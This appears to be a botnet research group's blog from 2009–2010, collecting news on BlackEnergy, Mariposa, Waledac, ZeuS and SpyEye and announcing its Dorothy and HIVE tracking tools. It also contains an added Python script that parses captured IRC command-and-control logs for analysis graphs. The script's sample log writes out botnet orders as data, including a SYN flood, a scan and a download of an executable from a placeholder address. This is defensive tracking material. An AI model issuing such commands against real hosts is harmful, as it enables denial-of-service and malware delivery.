05.03
2010
RSA Conference 2010 — Russian hackers have written a more sophisticated version of the infamous BlackEnergy Trojan associated with the 2008 cyberattacks against Georgia that now targets Russian and Ukrainian online banking customers.
“The rules have changed,” Stewart says. “There was once an unwritten rule that they didn’t attack their own banks.”
But like most cybercrime operations, money is money, and the BlackEnergy botnet gang appears to be expanding its operations for more profit.
While the Zeus Trojan remains the most popular Trojan, Stewart says BlackEnergy 2 can do things Zeus cannot, such as stealing online credentials plus DDoS-ing. BlackEnergy 2 also steals the user’s private encryption key. Stewart has written an analysis of the Trojan, available here.
via New BlackEnergy Trojan Targeting Russian, Ukrainian Banks – DarkReading.
03.03
2010
SAN FRANCISCO (AP) — Authorities have smashed one of the world’s biggest networks of virus-infected computers, a data vacuum that stole credit cards and online banking credentials from as many as 12.7 million poisoned PCs.
The “botnet” of infected computers included PCs inside more than half of the Fortune 1,000 companies and more than 40 major banks, according to investigators.
Spanish investigators, working with private computer-security firms, have arrested the three alleged ringleaders of the so-called Mariposa botnet, which appeared in December 2008 and grew into one of the biggest weapons of cybercrime. More arrests are expected soon in other countries.
Spanish authorities have planned a news conference for Wednesday in Madrid.
[....]
Also, the suspects go against the stereotype of genius programmers often associated with cyber crime. The suspects weren't brilliant hackers but had underworld contacts who helped them build and operate the botnet, Cesar Lorenza, a captain with Spain's Guardia Civil, which is investigating the case, told The Associated Press.
Investigators were examining bank records and seized computers to determine how much money the criminals made.
[....]
via News from The Associated Press.
An analysis report by Defence Intelligence is here.
25.02
2010
The takedown of the Waledac botnet that Microsoft executed this week – known internally as “Operation b49” – was the result of months of investigation and the innovative application of a tried and true legal strategy.
[..]
In a recent analysis, Microsoft found that between December 3-21, 2009, approximately 651 million spam emails attributable to Waledac were directed to Hotmail accounts alone, including offers and scams related to online pharmacies, imitation goods, jobs, penny stocks and more.
[..]
This action has quickly and effectively cut off traffic to Waledac at the “.com” or domain registry level, severing the connection between the command and control centers of the botnet and most of its thousands of zombie computers around the world.
via The Official Microsoft Blog – Cracking Down on Botnets.
Well done.
23.02
2010
Port Austin, Mich. based United Shortline Insurance Service Inc., an insurance provider serving the railroad industry, discovered on Feb. 5 that the computer used by their firm’s controller was behaving oddly and would not respond. The company’s computer technician scoured the system with multiple security tools, and found it had been invaded by “ZeuS,” a highly sophisticated banking Trojan that steals passwords and allows criminals to control infected hosts remotely.
[...]
“The bank said whoever logged in to make these transfers successfully answered those questions,” he said. “They had some very detailed information. [The thieves] knew our patterns, they knew our passwords, my mother’s middle name, favorite sports team. And this is all information I don’t even have written down anywhere.”
via Hackers Steal $150,000 from Mich. Insurance Firm — Krebs on Security.
19.02
2010
The “Kneber” botnet is made up of 74,126 machines in 196 countries that were infected with a variant of Zeus, Alex Cox, a principal analyst at NetWitness and the botnet's discoverer, told SCMagazineUS.com on Thursday.
…
The stolen data also includes credentials for corporate accounts and online banking sites, Cox said. The gang of hackers behind the attack, believed to be from Eastern Europe, have likely stolen millions of credentials. Cox discovered the botnet on Jan. 26 during routine analysis of a client's enterprise network.
….
The botnet was named Kneber, after the email address used to register the command-and-control server linking infected systems worldwide, he said.
via Newly discovered Zeus spinoff botnet has wide impact – SC Magazine US.
Here is the NetWitness research paper.
From Kneber FAQ :
06. What’s so special about it?
It’s the fact that despite the crimeware’s advanced E-banking sessions hijacking, the primary objective of their campaign — at least based on the sample analyzed by NetWitness researchers — was to steal social networking credentials.
Moreover, the Kneber botnet is a good example of an ongoing trend aiming to build and maintain beneath-the-radar botnets.
15.02
2010
Upstart crimeware wages turf war on mighty Zeus bot • The Register.
The SpyEye toolkit made its debut in December on Russian underground forums with a retail price of $500. It comes with usual configurable amenities such as a keylogger, credential stealers for credit cards, FTP and Pop3 email accounts, and a graphical control panel for managing large botnets.
Here is a deep analysis provided by Symantec.
If anyone knows more (malware hashes, or anything else), please contact us; we are currently investigating this new kind of trojan.
24.12
2009
Folks,
I would like to wish you a beautiful Christmas Eve!
Special wishes to our team, especially to those who are daily devoting their time to contributing to our project.
Claudio Guarnieri, Andrea Cavenago, and Patrizia Martemucci recently worked hard on developing new modules of the Dorothy framework (a malware analysis module, and the new dorothy-drone); really, thanks for their support, and I wish that during next year they will continue to give their fruitful contribution.
Next year we will be back in action, and releasing the new version of Dorothy (Dorothive) will be the primary project goal. So stay tuned!
Best Regards,
m4rco-
16.12
2009
Folks,
I would like to inform you all about our recent activities that we are attempting to achieve.
First of all, we have totally rebuilt our web site. This new one aims to be a central repository of all the (external/internal) news concerning botnets (mainly) and malware (secondarily).
We will use the blog for posting about our project developments, and for commenting on/reporting interesting news concerning the field we are currently treating, so you can now add a new entry to your feed reader.
The repository section aims to maintain a complete library of all the publications written (by us or others) up to today about botnets. Each one can be tagged and classified to give researchers an easy way to search for what they need. If you have a paper/doc about botnets, we will be proud to upload it here!
The Dorothy section is the web GUI of the framework I developed for irc-botnet tracking through interactive visualization. Maybe you have seen it before (I posted the link to this mailing list some months ago); since then I’ve improved the GUI, adding a “malwares” task for each C&C, and providing an afterglow graph for each malware and for each C&C.
We are also maintaining a Wiki, where you can find all the information about our tools/activities: you are all invited to contribute to it. The wiki has recently been “plugged” into the GUI, giving the possibility to create a new page for each C&C; in this way, every researcher can write about his own investigation of it.
Then I would like to introduce two new chapter members: Emanuele Goldoni and Davide Cavalca.
I asked them to join our team after reading their research work regarding the development of an automated framework for malware analysis and irc/web botnet tracking.
Their tool “HIVE” is really similar to the ones I developed, but presents a more robust data architecture. Dorothy and HIVE were developed to achieve the same goal: whereas the first focuses on visualization methods as its strong point, the second treats the acquisition process in a more engineering-oriented manner: its data repository has been designed to be capable of receiving data from a wide sensor deployment.
We are currently defining the details of a possible collaboration between the Information Technology Department of the University of Milan and the Networking Lab of the University of Pavia (where Emanuele works as a researcher). Both universities are currently offering their graduating students the chance to conduct their diploma theses on the improvement of our framework. Currently, we are following the work of three students: one is developing a new multiplatform drone for irc botnet tracking, and the others are developing a dedicated framework for malware analysis (static and dynamic).
Currently, Davide and I are developing a new integrated framework (Dorothive) that inherits all the goodness of our previous tools.
Thanks to Davide and Emanuele’s contribution, our chapter is growing fast; they are very skilled people and are as motivated as I am to make our chapter as interesting as possible: working with them is a real pleasure.
I ask you all to view our new site; to access the private sections (wiki, Dorothy) you need to register.
Currently registrations are not open to the wide public, so if you want an account please let me know and I will provide you one.
Please give us your feedback/comments/suggestions/criticisms/anything; we will treasure it!
Best Regards,
m4rco-
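As an added example of the irc-botnet tracking idea described in the message above (this is illustrative code written here, not Dorothy's or HIVE's code), the following Python script takes the raw IRC lines a tracking drone would log while sitting in a C&C channel, pulls the herder's commands out of the channel topic and channel messages, and emits the (source, event, target) edge rows an afterglow-style graph is built from. The log lines, server name, channel, nicks and bot commands are constructed for the example; the "." command prefix and the three-column CSV layout for AfterGlow are assumptions, not something the page documents.

```python
"""Turn raw IRC traffic seen by a tracking drone in a botnet C&C channel into
(source, event, target) edges for an AfterGlow-style graph.

Added illustrative example; not Dorothy or HIVE code. The log below is
constructed (RFC 5737 documentation addresses), as are the bot commands.
"""
import re
from typing import List, Optional, Tuple

# Constructed sample of what a drone might receive after joining the channel.
SAMPLE_IRC_LOG = """\
:irc.example.test 001 drone :Welcome to the network, drone
:irc.example.test 332 drone #bots :.ddos.syn 192.0.2.10 80 600
:herder!h@10.0.0.5 TOPIC #bots :.download http://198.51.100.7/upd.exe
:herder!h@10.0.0.5 PRIVMSG #bots :.login s3cret
:bot1234!x@10.0.0.9 JOIN :#bots
:herder!h@10.0.0.5 PRIVMSG #bots :.scan 203.0.113.0/24
PING :irc.example.test
"""

IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+) )?(?P<cmd>\S+)(?: (?P<params>.*))?$")
URL_RE = re.compile(r"https?://\S+")
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}(?:/\d{1,2})?\b")

Edge = Tuple[str, str, str]


def parse_irc_line(line: str) -> Optional[Tuple[Optional[str], str, List[str]]]:
    """Split one RFC 1459 message into (prefix, COMMAND, [params]).

    The trailing parameter (introduced by ' :') may contain spaces, so it is
    kept whole; middle parameters are split on whitespace.
    """
    line = line.rstrip("\r\n")
    if not line.strip():
        return None
    m = IRC_LINE.match(line)
    if not m:
        return None
    params = m.group("params") or ""
    if params.startswith(":"):
        args = [params[1:]]
    else:
        head, sep, trailing = params.partition(" :")
        args = head.split()
        if sep:
            args.append(trailing)
    return m.group("prefix"), m.group("cmd").upper(), args


def nick_of(prefix: Optional[str]) -> str:
    """'herder!h@10.0.0.5' -> 'herder'; a server prefix is returned as-is."""
    return prefix.split("!", 1)[0] if prefix else "?"


def extract_iocs(text: str) -> List[str]:
    """URLs first, then bare IPv4 addresses/CIDRs that are not inside a URL."""
    urls = URL_RE.findall(text)
    return urls + IP_RE.findall(URL_RE.sub(" ", text))


def extract_edges(log_text: str, command_prefix: str = ".") -> List[Edge]:
    """Build graph edges from a channel log.

    Commands are taken from the channel topic (332 replayed on join, TOPIC
    changes) and from PRIVMSG. Each command yields (actor, command, channel)
    plus one (command, 'target', ioc) edge per URL/IP in its arguments; bot
    joins yield (nick, 'join', channel). PING and other numerics are ignored.
    """
    edges: List[Edge] = []
    for raw in log_text.splitlines():
        parsed = parse_irc_line(raw)
        if parsed is None:
            continue
        prefix, cmd, args = parsed
        if cmd == "332" and len(args) >= 3:          # RPL_TOPIC: <me> <chan> :<topic>
            channel, text = args[1], args[2]
        elif cmd in ("TOPIC", "PRIVMSG") and len(args) >= 2:
            channel, text = args[0], args[1]
        elif cmd == "JOIN" and args:
            edges.append((nick_of(prefix), "join", args[0]))
            continue
        else:
            continue
        if not text.startswith(command_prefix):       # chatter, not a bot command
            continue
        verb = text.split()[0]
        edges.append((nick_of(prefix), verb, channel))
        edges.extend((verb, "target", ioc) for ioc in extract_iocs(text))
    return edges


def to_afterglow_csv(edges: List[Edge]) -> str:
    """Three-column CSV (source,event,target); assumed AfterGlow input layout."""
    return "\n".join(",".join(e) for e in edges)


if __name__ == "__main__":
    print(to_afterglow_csv(extract_edges(SAMPLE_IRC_LOG)))
```

Feeding the CSV to a graph tool gives one node per herder, channel, command and target; a new target IP or update URL shows up as a new leaf, which is the kind of per-C&C view the message describes. The topic replayed by the server (332) is attributed to the server prefix because the drone cannot see who originally set it.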
14.12
2009
MessageLabs' list of the top 10 botnets in 2009
via Top 10 botnets and their impact.